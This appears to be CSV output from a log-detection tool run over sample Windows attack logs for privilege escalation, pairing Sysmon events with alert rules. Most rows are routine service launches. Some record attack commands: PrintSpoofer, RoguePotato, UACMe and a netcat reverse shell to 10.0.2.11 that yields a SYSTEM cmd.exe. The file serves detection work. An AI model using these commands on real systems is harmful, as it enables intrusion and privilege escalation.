2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit  :  Command: c:\Program Files\vulnsvc\mmm.exe  :  Path: C:\program.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe  :  Path: C:\Windows\System32\sihost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService  :  Path: C:\Windows\System32\svchost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications  :  Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time  :  Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0  :  Path: C:\BGinfo\BGINFO.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe  :  Path: C:\Windows\System32\SecurityHealthService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding  :  Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background  :  Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe""   :  Path: C:\Windows\regedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe""   :  Path: C:\Windows\regedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe  -i -c powershell.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: PrintSpoofer.exe  -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe  -i -c ""c:\Windows\System32\cmd.exe""  :  Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: NetworkServiceExploit.exe  -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe  -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999  :  Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe  :  Path: C:\Users\IEUser\Tools\Misc\nc64.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: RoguePotato.exe  -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe  58 c:\Windows\System32\cmd.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
